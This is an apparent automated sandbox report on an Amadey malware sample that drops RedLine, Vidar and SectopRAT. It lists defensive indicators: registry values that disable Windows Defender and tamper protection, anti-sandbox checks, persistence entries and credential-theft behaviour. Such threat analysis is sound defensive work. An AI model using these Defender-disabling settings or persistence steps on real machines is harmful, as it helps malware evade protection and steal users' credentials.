amadey | 0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

defense_evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 6 IoCs

resource	yara_rule
behavioral1/memory/5372-333-0x0000000000800000-0x0000000000C78000-memory.dmp	family_sectoprat
behavioral1/memory/5372-334-0x0000000000800000-0x0000000000C78000-memory.dmp	family_sectoprat
behavioral1/memory/1076-1422-0x0000000000690000-0x0000000000B08000-memory.dmp	family_sectoprat
behavioral1/memory/1076-1423-0x0000000000690000-0x0000000000B08000-memory.dmp	family_sectoprat
behavioral1/memory/1076-2983-0x0000000000690000-0x0000000000B08000-memory.dmp	family_sectoprat
behavioral1/memory/5372-2985-0x0000000000800000-0x0000000000C78000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 27 IoCs

Query Registry

Virtualization/Sandbox Evasion

credential_access stealer

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d2YQIJa.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	spoDnGT.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	afaefd507f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	67152b305c.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	26da168d66.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ViGgA8C.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	sHN20me.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	MAl7pjE.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ebp51gY.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d35ce9d381.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	33f82ae2b0.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1cc9b19df2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ebp51gY.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	fa829ac30d.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5a903ed074.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	b91b4b1726.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempP38TDZ3N0DXTVKH63N3AOQ5IBQLFYYV0.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1e56a29b0d.exe

Blocklisted process makes network request 64 IoCs

flow	pid	Process
38	5572	powershell.exe
39	5572	powershell.exe
44	5572	powershell.exe
46	5572	powershell.exe
47	5572	powershell.exe
50	5572	powershell.exe
51	5572	powershell.exe
52	5572	powershell.exe
55	5572	powershell.exe
58	5572	powershell.exe
62	5572	powershell.exe
64	5572	powershell.exe
67	5572	powershell.exe
70	5572	powershell.exe
71	5572	powershell.exe
72	5572	powershell.exe
73	5572	powershell.exe
74	5572	powershell.exe
75	5572	powershell.exe
76	5572	powershell.exe
77	5572	powershell.exe
78	5572	powershell.exe
79	5572	powershell.exe
80	5572	powershell.exe
81	5572	powershell.exe
82	5572	powershell.exe
83	5572	powershell.exe
84	5572	powershell.exe
85	5572	powershell.exe
86	5572	powershell.exe
91	5572	powershell.exe
94	5572	powershell.exe
96	5572	powershell.exe
98	5572	powershell.exe
99	5572	powershell.exe
100	5572	powershell.exe
101	5572	powershell.exe
102	5572	powershell.exe
103	5572	powershell.exe
104	5572	powershell.exe
106	5572	powershell.exe
107	5572	powershell.exe
108	5572	powershell.exe
109	5572	powershell.exe
111	5572	powershell.exe
112	5572	powershell.exe
113	5572	powershell.exe
116	5572	powershell.exe
118	5572	powershell.exe
121	5572	powershell.exe
122	5572	powershell.exe
123	5572	powershell.exe
124	5572	powershell.exe
125	5572	powershell.exe
126	5572	powershell.exe
127	5572	powershell.exe
128	5572	powershell.exe
129	5572	powershell.exe
132	5572	powershell.exe
134	5572	powershell.exe
140	5572	powershell.exe
142	5572	powershell.exe
145	5572	powershell.exe
147	5572	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3376	powershell.exe
4512	powershell.exe
4812	powershell.exe
72	powershell.exe
568	powershell.exe
3696	powershell.exe
5804	powershell.exe
1996	powershell.exe

Downloads MZ/PE file 35 IoCs

flow	pid	Process
3	4576	skotes.exe
3	4576	skotes.exe
3	4576	skotes.exe
3	4576	skotes.exe
3	4576	skotes.exe
3	4576	skotes.exe
3	4576	skotes.exe
3	4576	skotes.exe
3	4576	skotes.exe
3	4576	skotes.exe
3	4576	skotes.exe
3	4576	skotes.exe
3	4576	skotes.exe
3	4576	skotes.exe
3	4576	skotes.exe
3	4576	skotes.exe
3	4576	skotes.exe
3	4576	skotes.exe
3	4576	skotes.exe
3	4576	skotes.exe
3	4576	skotes.exe
3	4576	skotes.exe
3	4576	skotes.exe
3	4576	skotes.exe
3	4576	skotes.exe
3	4576	skotes.exe
176	4576	skotes.exe
176	4576	skotes.exe
176	4576	skotes.exe
176	4576	skotes.exe
308	5580	BitLockerToGo.exe
338	3960	BitLockerToGo.exe
184	3696	powershell.exe
212	5804	powershell.exe
350	1996	powershell.exe

Uses browser remote debugging 2 TTPs 28 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
5948	msedge.exe
5324	msedge.exe
4584	chrome.exe
484	chrome.exe
852	msedge.exe
5856	chrome.exe
5192	chrome.exe
4816	chrome.exe
5960	chrome.exe
3884	chrome.exe
4980	chrome.exe
2268	msedge.exe
6036	msedge.exe
3040	chrome.exe
2332	chrome.exe
3264	msedge.exe
5488	chrome.exe
6056	msedge.exe
4760	msedge.exe
1616	chrome.exe
3948	chrome.exe
5000	msedge.exe
5988	msedge.exe
5232	msedge.exe
3128	msedge.exe
1604	chrome.exe
2640	chrome.exe
5712	msedge.exe

Checks BIOS information in registry 2 TTPs 54 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5a903ed074.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	b91b4b1726.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ViGgA8C.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ViGgA8C.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1cc9b19df2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	b91b4b1726.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d2YQIJa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d2YQIJa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	afaefd507f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d35ce9d381.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d35ce9d381.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sHN20me.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	spoDnGT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MAl7pjE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	afaefd507f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1cc9b19df2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5a903ed074.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	MAl7pjE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ebp51gY.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	67152b305c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1e56a29b0d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ebp51gY.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	fa829ac30d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	spoDnGT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempP38TDZ3N0DXTVKH63N3AOQ5IBQLFYYV0.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempP38TDZ3N0DXTVKH63N3AOQ5IBQLFYYV0.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ebp51gY.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	fa829ac30d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	26da168d66.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	26da168d66.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ebp51gY.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	67152b305c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	33f82ae2b0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1e56a29b0d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sHN20me.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	33f82ae2b0.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat	powershell.exe

Executes dropped EXE 50 IoCs

pid	Process
4576	skotes.exe
2832	6349023c59.exe
1556	6349023c59.exe
5736	6349023c59.exe
1612	6349023c59.exe
3940	13Z5sqy.exe
1396	jonbDes.exe
852	Bjkm5hE.exe
2696	Bjkm5hE.exe
1672	Bjkm5hE.exe
5372	ViGgA8C.exe
2556	DTQCxXZ.exe
5832	TaVOM7x.exe
4104	d2YQIJa.exe
2104	sHN20me.exe
3912	spoDnGT.exe
1408	7aencsM.exe
3804	7aencsM.exe
5508	7aencsM.exe
3992	skotes.exe
5588	dzvh4HC.exe
1952	MAl7pjE.exe
1484	lwtLxxH.exe
1716	7nSTXG6.exe
3172	c9aa4cecce.exe
1560	TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE
4432	ebp51gY.exe
3244	483d2fa8a0d53818306efeb32d3.exe
5208	a8a5b07bf4.exe
1692	d74640f13d.exe
3792	afaefd507f.exe
5944	67152b305c.exe
1076	d35ce9d381.exe
3588	skotes.exe
2680	33f82ae2b0.exe
3116	1cc9b19df2.exe
3244	5a903ed074.exe
2436	b91b4b1726.exe
1752	54352f7f9d.exe
1404	85e559204e.exe
6200	TempP38TDZ3N0DXTVKH63N3AOQ5IBQLFYYV0.EXE
6676	1e56a29b0d.exe
4696	ebp51gY.exe
6984	DTQCxXZ.exe
4956	7nSTXG6.exe
6680	fa829ac30d.exe
3808	26da168d66.exe
4148	skotes.exe
4884	skotes.exe
6048	skotes.exe

Identifies Wine through registry keys 2 TTPs 27 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine	d2YQIJa.exe
Key opened	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine	MAl7pjE.exe
Key opened	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine	ebp51gY.exe
Key opened	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine	b91b4b1726.exe
Key opened	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine	spoDnGT.exe
Key opened	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine	TempP38TDZ3N0DXTVKH63N3AOQ5IBQLFYYV0.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine	ebp51gY.exe
Key opened	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine	fa829ac30d.exe
Key opened	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine	67152b305c.exe
Key opened	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine	TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine	33f82ae2b0.exe
Key opened	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine	5a903ed074.exe
Key opened	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine	1e56a29b0d.exe
Key opened	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine	26da168d66.exe
Key opened	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine	sHN20me.exe
Key opened	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine	afaefd507f.exe
Key opened	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine	d35ce9d381.exe
Key opened	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine	1cc9b19df2.exe
Key opened	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
Key opened	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine	ViGgA8C.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 2 IoCs

defense_evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Microsoft\Windows\CurrentVersion\Run\c9aa4cecce.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090366101\\c9aa4cecce.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090367021\\am_no.cmd"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Microsoft\Windows\CurrentVersion\Run\5a903ed074.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090379001\\5a903ed074.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Microsoft\Windows\CurrentVersion\Run\b91b4b1726.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090380001\\b91b4b1726.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Microsoft\Windows\CurrentVersion\Run\54352f7f9d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090381001\\54352f7f9d.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Microsoft\Windows\CurrentVersion\Run\85e559204e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090382001\\85e559204e.exe"	skotes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	ipinfo.io

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x001100000002af84-1041.dat	autoit_exe
behavioral1/files/0x001b00000002afe0-1892.dat	autoit_exe
behavioral1/files/0x002d00000002aff3-1973.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 27 IoCs

pid	Process
5468	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
4576	skotes.exe
5372	ViGgA8C.exe
4104	d2YQIJa.exe
2104	sHN20me.exe
3912	spoDnGT.exe
3992	skotes.exe
1952	MAl7pjE.exe
1560	TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE
4432	ebp51gY.exe
3244	483d2fa8a0d53818306efeb32d3.exe
3792	afaefd507f.exe
5944	67152b305c.exe
1076	d35ce9d381.exe
3588	skotes.exe
2680	33f82ae2b0.exe
3116	1cc9b19df2.exe
3244	5a903ed074.exe
2436	b91b4b1726.exe
6200	TempP38TDZ3N0DXTVKH63N3AOQ5IBQLFYYV0.EXE
6676	1e56a29b0d.exe
4696	ebp51gY.exe
6680	fa829ac30d.exe
3808	26da168d66.exe
4148	skotes.exe
4884	skotes.exe
6048	skotes.exe

Suspicious use of SetThreadContext 13 IoCs

description	pid	Process	procid_target
PID 2832 set thread context of 1556	2832	6349023c59.exe	85
PID 2832 set thread context of 1612	2832	6349023c59.exe	87
PID 852 set thread context of 2696	852	Bjkm5hE.exe	114
PID 852 set thread context of 1672	852	Bjkm5hE.exe	115
PID 1408 set thread context of 3804	1408	7aencsM.exe	134
PID 1408 set thread context of 5508	1408	7aencsM.exe	135
PID 3940 set thread context of 3332	3940	13Z5sqy.exe	138
PID 5832 set thread context of 6124	5832	TaVOM7x.exe	143
PID 1716 set thread context of 5268	1716	7nSTXG6.exe	236
PID 5944 set thread context of 5580	5944	67152b305c.exe	245
PID 2680 set thread context of 3960	2680	33f82ae2b0.exe	265
PID 5208 set thread context of 412	5208	a8a5b07bf4.exe	272
PID 4956 set thread context of 5096	4956	7nSTXG6.exe	365

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001d00000002af61-844.dat	upx
behavioral1/memory/5588-856-0x0000000000FC0000-0x0000000002282000-memory.dmp	upx
behavioral1/memory/5588-907-0x0000000000FC0000-0x0000000002282000-memory.dmp	upx

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File created	C:\Windows\Tasks\skotes.job	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
1952	2832	WerFault.exe	83
1592	852	WerFault.exe	113
2856	1408	WerFault.exe	133
1092	3116	WerFault.exe	246

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TaVOM7x.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	33f82ae2b0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MAl7pjE.exe
